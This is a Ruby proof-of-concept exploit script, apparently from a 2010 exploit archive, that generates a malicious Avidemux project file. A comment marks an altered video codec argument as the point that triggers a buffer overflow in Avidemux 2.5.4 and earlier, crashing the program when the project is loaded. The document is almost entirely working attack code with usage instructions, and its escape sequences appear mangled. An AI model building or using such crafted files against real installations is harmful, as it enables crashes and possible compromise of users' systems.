#!/usr/bin/env ruby
# avidemux_crash.rb
#
# Title		:	Avidemux <= 2.5.4 Buffer Overflow PoC
# Date		:	31.10.2010
# Version	: 	<= 2.5.4
# Software Link	: 	http://avidemux.sourceforge.net/download.html / http://avidemux.razorbyte.com.au/
# Author	:	The_UnKn@wn
# Email		: 	the_unknown [at] group51 [dot] org
# Homepage	: 	http://group51.org
# Tested on	:	openSUSE 11.3 and Windows XP SP3 English
#
# Usage:
# 	ruby avidemux_crash.rb <a *.mpg file>
# 	Start Avidemux --> Load/Run Project --> crash!!
#
# Note:
# 	You can also use another video file format you would have to change the Format in Line and maybe some other stuff #54 too
#

file = ARGV[0]

if file.nil?
	puts "Usage: ruby #{__FILE__} <path to sample video .mpg file>"
	exit
end
name = "avidemux.prj"

text = "//AD  <- Needed to identify//n" +
"//--automatically built--n"+
"var app = new Avidemux();n"+
"//** Video **n"+
"// 01 videos source n"+
"app.load("#{file}");n"+
"//01 segments:n"+
"app.clearSegments();n"+
"app.addSegment(0,0,157699);n"+
"app.markerA=0;n"+
"app.markerB=77543;n"+
"app.rebuildIndex();n"+
"//** Postproc **n"+
"app.video.setPostProc(3,3,0);n"+
"app.video.fps1000 = 25000;n"+
"//** Filters **n"+
"//** Video Codec conf **n"+
"app.video.codec("Copy", "CQ=4", "200 "); n"+ # <-- here is the vuln app.video.codec("Copy","CQ=4","0 ");
"//** Audio **n"+
"app.audio.reset();n"+
"app.audio.codec("copy",-1078515528,0,"");n"+
"app.audio.normalizeMode=0;n"+
"app.audio.normalizeValue=0;n"+
"app.audio.delay=0;n"+
"app.audio.mixer="NONE";n"+
"app.setContainer("AVI");n"+
"setSuccess(1);n"+
"//app.Exit();n"+
"//End of script"

File.open(name, "w") do |f|
	f.puts(text)
end

puts "File #{name} has been created successfully"